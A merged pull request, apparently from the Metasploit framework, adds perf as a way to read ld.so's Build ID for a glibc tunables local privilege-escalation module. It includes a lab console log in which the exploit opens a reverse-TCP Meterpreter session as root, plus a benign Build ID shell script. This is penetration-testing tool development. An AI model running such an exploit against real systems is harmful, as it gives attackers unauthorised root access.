Add a way to get the buildid via perf #18645

Merged
merged 1 commit into from Jan 23, 2024

jvoisin
Contributor

@jvoisin jvoisin commented Dec 29, 2023

In the same spirit as #18632, since it's pretty common to have perf installed on some production machines.

$ perf buildid-list -i /bin/bash
0b6b11360e339f231f17484da2c87d0d78554e31
$

@jheysel-r7 jheysel-r7 self-assigned this Jan 23, 2024
@jheysel-r7
Contributor

Thanks for the addition @jvoisin! I installed perf version 6.2.16 on Ubuntu 22.04, edited def check_ld_so_build_id so that using perf was the only code path and it worked great.

msf6 exploit(linux/local/glibc_tunables_priv_esc) > run

[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[*] Using perf
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:39842) at 2024-01-22 21:52:28 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.123.228
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 added the rn-enhancement release notes enhancement label Jan 23, 2024
@jheysel-r7 jheysel-r7 merged commit 9533827 into rapid7:master Jan 23, 2024
36 checks passed
@jheysel-r7
Contributor

Release Notes

This PR adds a way to get the Build ID from ld.so by using the 'perf' command. Before, this module depended on the commands 'file' and 'readelf' being installed to get the Build ID.
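
Reading a Build ID with whichever of the three tools named in this thread (perf, readelf, file) is installed, as an added shell example that is not the module's own Ruby code. The function names, return codes and the order in which the tools are tried are assumptions of this example.

```shell
#!/bin/sh
# Added example, not Metasploit code: print the GNU Build ID of an ELF file
# using perf, readelf or file, whichever is available (order is an assumption).

# perf buildid-list -i <elf> prints the ID as a bare hex string.
parse_perf() {
  awk '$1 ~ /^[0-9a-f]+$/ { print $1; exit }'
}

# readelf -n prints a line of the form "    Build ID: <hex>".
parse_readelf() {
  sed -n 's/^[[:space:]]*Build ID:[[:space:]]*\([0-9a-f]\{1,\}\).*/\1/p' | head -n 1
}

# file prints "..., BuildID[sha1]=<hex>, ..." among its comma-separated fields.
parse_file() {
  sed -n 's/.*BuildID\[[^]]*]=\([0-9a-f]\{1,\}\).*/\1/p' | head -n 1
}

have() { command -v "$1" >/dev/null 2>&1; }

# Usage: get_build_id <path>. Returns 2 if unreadable, 1 if no ID was found.
get_build_id() {
  elf=$1
  id=
  [ -r "$elf" ] || { echo "cannot read: $elf" >&2; return 2; }
  if have perf; then
    id=$(perf buildid-list -i "$elf" 2>/dev/null | parse_perf)
  fi
  if [ -z "$id" ] && have readelf; then
    id=$(readelf -n "$elf" 2>/dev/null | parse_readelf)
  fi
  if [ -z "$id" ] && have file; then
    id=$(file -L "$elf" 2>/dev/null | parse_file)   # -L: follow symlinks
  fi
  [ -n "$id" ] || { echo "no Build ID found: $elf" >&2; return 1; }
  printf '%s\n' "$id"
}

if [ "$#" -gt 0 ]; then
  get_build_id "$1"
fi
```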
